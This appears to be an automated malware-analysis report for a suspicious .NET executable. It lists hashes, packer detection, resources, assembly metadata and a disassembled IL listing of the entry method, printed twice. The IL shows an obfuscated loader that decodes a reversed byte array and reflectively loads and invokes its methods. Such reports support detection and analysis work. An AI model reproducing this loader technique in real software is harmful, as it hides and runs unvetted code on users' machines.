Suspicious
Suspect

3301cbe054a050ef7758c7c2d26b7a48

PE Executable
|
MD5: 3301cbe054a050ef7758c7c2d26b7a48
|
Size: 1.38 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
3301cbe054a050ef7758c7c2d26b7a48
Sha1
beb9a539de6c87822d4f99bffef862724c3d478f
Sha256
4e45b33ef8d4447d199c7e6f7bb9d2e4baa3c2370a1e4e0ffa72bc042c9a5ca6
Sha384
592bbfcb1193fbbc8dbd50e2b078c5e612c7987784845a3d61bd558e6775bf77831ab8cf23a6f6f6d38d8d9da9268c7c
Sha512
de949f568f792ca7414c98f5212c76506bb77b2ec2532fc43f77185fa9c3f1b5a150272d1423cf31d38af6e1bcbbc600afc915b920cd8b5c2231532a755e45e4
SSDeep
24576:r+3ElrPGJtVD79VMCnRveYepqMKDmfC4KOSSn2P6UTEps:r+YaTVNRveYkqM3fC41p2I
TLSH
DA55E11E27D38754E8ADC778DA72651843F0BA5BDB27F73BB98120EECA167069105323

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
3301cbe054a050ef7758c7c2d26b7a48
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
gDo3t.Resources.resources
6c33d99210ee3f.Resources.resources
6e01bfb80
[NBF]root.Data
6e01bfb81
[NBF]root.Data
6e01bfb810
[NBF]root.Data
6e01bfb811
[NBF]root.Data
6e01bfb812
[NBF]root.Data
6e01bfb813
[NBF]root.Data
6e01bfb814
[NBF]root.Data
6e01bfb815
[NBF]root.Data
6e01bfb816
[NBF]root.Data
6e01bfb817
[NBF]root.Data
6e01bfb818
[NBF]root.Data
6e01bfb819
[NBF]root.Data
6e01bfb82
[NBF]root.Data
6e01bfb820
[NBF]root.Data
6e01bfb821
[NBF]root.Data
6e01bfb822
[NBF]root.Data
6e01bfb823
[NBF]root.Data
6e01bfb824
[NBF]root.Data
6e01bfb825
[NBF]root.Data
6e01bfb826
[NBF]root.Data
6e01bfb827
[NBF]root.Data
6e01bfb828
[NBF]root.Data
6e01bfb829
[NBF]root.Data
6e01bfb83
[NBF]root.Data
6e01bfb830
[NBF]root.Data
6e01bfb831
[NBF]root.Data
6e01bfb832
[NBF]root.Data
6e01bfb833
[NBF]root.Data
6e01bfb834
[NBF]root.Data
6e01bfb835
[NBF]root.Data
6e01bfb836
[NBF]root.Data
6e01bfb837
[NBF]root.Data
6e01bfb838
[NBF]root.Data
6e01bfb839
[NBF]root.Data
6e01bfb84
[NBF]root.Data
6e01bfb840
[NBF]root.Data
6e01bfb841
[NBF]root.Data
6e01bfb85
[NBF]root.Data
6e01bfb86
[NBF]root.Data
6e01bfb87
[NBF]root.Data
6e01bfb88
[NBF]root.Data
6e01bfb89
[NBF]root.Data
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

gDo3t
Full Name

gDo3t
EntryPoint

System.Void gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS::0jeTy2EadX()
Scope Name

gDo3t
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

gDo3t
Assembly Version

24.21.6.6
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

1050
Main Method

System.Void gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS::0jeTy2EadX()
Main IL Instruction Count

133
Main IL

nop <null> newobj System.Void System.Windows.Forms.Form::.ctor() stloc.0 <null> newobj System.Void System.Random::.ctor() stloc.1 <null> newobj System.Void System.Windows.Forms.Form::.ctor() stloc.3 <null> nop <null> ldloc.1 <null> ldc.i4.s -10 ldc.i4.s 10 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> cgt <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0058: nop ldstr System.AppDomain call System.Type System.Type::GetType(System.String) stloc.s V_6 ldloc.s V_6 ldstr CurrentDomain ldc.i4.s 24 callvirt System.Reflection.PropertyInfo System.Type::GetProperty(System.String,System.Reflection.BindingFlags) stloc.s V_7 ldloc.s V_7 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.PropertyInfo::GetValue(System.Object,System.Object[]) call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) stloc.2 <null> br.s IL_0076: nop nop <null> ldstr System.Object call System.Type System.Type::GetType(System.String) stloc.s V_8 ldloc.s V_8 call System.Object System.Activator::CreateInstance(System.Type) call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) stloc.2 <null> nop <null> nop <null> br.s IL_0013: nop nop <null> ldloc.2 <null> ldnull <null> ldstr Load ldc.i4.1 <null> newarr System.Object dup <null> ldc.i4.0 <null> call System.Byte[] gDo3t.Pt5cp8j/6MapyqQ35byJiH.1zkXm::dWw2zj7CkR() call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) ldsfld System.Func`3<System.Byte,System.Int32,System.Byte> gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::aw7XWjd brfalse.s IL_00A3: ldsfld gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::7fgMD9 ldsfld System.Func`3<System.Byte,System.Int32,System.Byte> gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::aw7XWjd br.s IL_00B9: call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Select<System.Byte,System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>,System.Func`3<System.Byte,System.Int32,System.Byte>) ldsfld gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::7fgMD9 ldftn System.Byte gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::Mq0pq1Tb(System.Byte,System.Int32) newobj System.Void System.Func`3<System.Byte,System.Int32,System.Byte>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`3<System.Byte,System.Int32,System.Byte> gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::aw7XWjd call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Select<System.Byte,System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>,System.Func`3<System.Byte,System.Int32,System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) stelem.ref <null> ldnull <null> ldnull <null> ldnull <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldnull <null> ldstr GetTypes ldc.i4.1 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldc.i4.s 24 box System.Int32 stelem.ref <null> ldnull <null> ldnull <null> ldnull <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldnull <null> ldstr GetMethods ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) castclass System.Collections.IEnumerable callvirt System.Collections.IEnumerator System.Collections.IEnumerable::GetEnumerator() stloc.s V_9 br.s IL_0143: ldloc.s V_9 ldloc.s V_9 callvirt System.Object System.Collections.IEnumerator::get_Current() call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) stloc.s V_10 nop <null> ldloc.s V_10 castclass System.Reflection.MethodInfo ldnull <null> ldc.i4.0 <null> newarr System.Object callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_0141: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0141: nop nop <null> nop <null> ldloc.s V_9 callvirt System.Boolean System.Collections.IEnumerator::MoveNext() stloc.s V_12 ldloc.s V_12 brtrue.s IL_010C: ldloc.s V_9 leave.s IL_0169: ret ldloc.s V_9 isinst System.IDisposable brfalse.s IL_0168: endfinally ldloc.s V_9 isinst System.IDisposable callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ret <null>
Module Name

gDo3t
Full Name

gDo3t
EntryPoint

System.Void gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS::0jeTy2EadX()
Scope Name

gDo3t
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

gDo3t
Assembly Version

24.21.6.6
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

1050
Main Method

System.Void gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS::0jeTy2EadX()
Main IL Instruction Count

133
Main IL

nop <null> newobj System.Void System.Windows.Forms.Form::.ctor() stloc.0 <null> newobj System.Void System.Random::.ctor() stloc.1 <null> newobj System.Void System.Windows.Forms.Form::.ctor() stloc.3 <null> nop <null> ldloc.1 <null> ldc.i4.s -10 ldc.i4.s 10 callvirt System.Int32 System.Random::Next(System.Int32,System.Int32) stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> cgt <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0058: nop ldstr System.AppDomain call System.Type System.Type::GetType(System.String) stloc.s V_6 ldloc.s V_6 ldstr CurrentDomain ldc.i4.s 24 callvirt System.Reflection.PropertyInfo System.Type::GetProperty(System.String,System.Reflection.BindingFlags) stloc.s V_7 ldloc.s V_7 ldnull <null> ldnull <null> callvirt System.Object System.Reflection.PropertyInfo::GetValue(System.Object,System.Object[]) call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) stloc.2 <null> br.s IL_0076: nop nop <null> ldstr System.Object call System.Type System.Type::GetType(System.String) stloc.s V_8 ldloc.s V_8 call System.Object System.Activator::CreateInstance(System.Type) call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) stloc.2 <null> nop <null> nop <null> br.s IL_0013: nop nop <null> ldloc.2 <null> ldnull <null> ldstr Load ldc.i4.1 <null> newarr System.Object dup <null> ldc.i4.0 <null> call System.Byte[] gDo3t.Pt5cp8j/6MapyqQ35byJiH.1zkXm::dWw2zj7CkR() call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Reverse<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) ldsfld System.Func`3<System.Byte,System.Int32,System.Byte> gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::aw7XWjd brfalse.s IL_00A3: ldsfld gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::7fgMD9 ldsfld System.Func`3<System.Byte,System.Int32,System.Byte> gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::aw7XWjd br.s IL_00B9: call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Select<System.Byte,System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>,System.Func`3<System.Byte,System.Int32,System.Byte>) ldsfld gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::7fgMD9 ldftn System.Byte gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::Mq0pq1Tb(System.Byte,System.Int32) newobj System.Void System.Func`3<System.Byte,System.Int32,System.Byte>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`3<System.Byte,System.Int32,System.Byte> gDo3t.6Crnf7FqTtk0y8/rf9WaJa.pGp7n5Fb9caS/Ek0xgdJ7.9i_ZxqS82byNA::aw7XWjd call System.Collections.Generic.IEnumerable`1<System.Byte> System.Linq.Enumerable::Select<System.Byte,System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>,System.Func`3<System.Byte,System.Int32,System.Byte>) call System.Byte[] System.Linq.Enumerable::ToArray<System.Byte>(System.Collections.Generic.IEnumerable`1<System.Byte>) stelem.ref <null> ldnull <null> ldnull <null> ldnull <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldnull <null> ldstr GetTypes ldc.i4.1 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldc.i4.s 24 box System.Int32 stelem.ref <null> ldnull <null> ldnull <null> ldnull <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldnull <null> ldstr GetMethods ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) castclass System.Collections.IEnumerable callvirt System.Collections.IEnumerator System.Collections.IEnumerable::GetEnumerator() stloc.s V_9 br.s IL_0143: ldloc.s V_9 ldloc.s V_9 callvirt System.Object System.Collections.IEnumerator::get_Current() call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) stloc.s V_10 nop <null> ldloc.s V_10 castclass System.Reflection.MethodInfo ldnull <null> ldc.i4.0 <null> newarr System.Object callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_0141: nop dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_11 nop <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0141: nop nop <null> nop <null> ldloc.s V_9 callvirt System.Boolean System.Collections.IEnumerator::MoveNext() stloc.s V_12 ldloc.s V_12 brtrue.s IL_010C: ldloc.s V_9 leave.s IL_0169: ret ldloc.s V_9 isinst System.IDisposable brfalse.s IL_0168: endfinally ldloc.s V_9 isinst System.IDisposable callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ret <null>
3301cbe054a050ef7758c7c2d26b7a48 (1.38 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙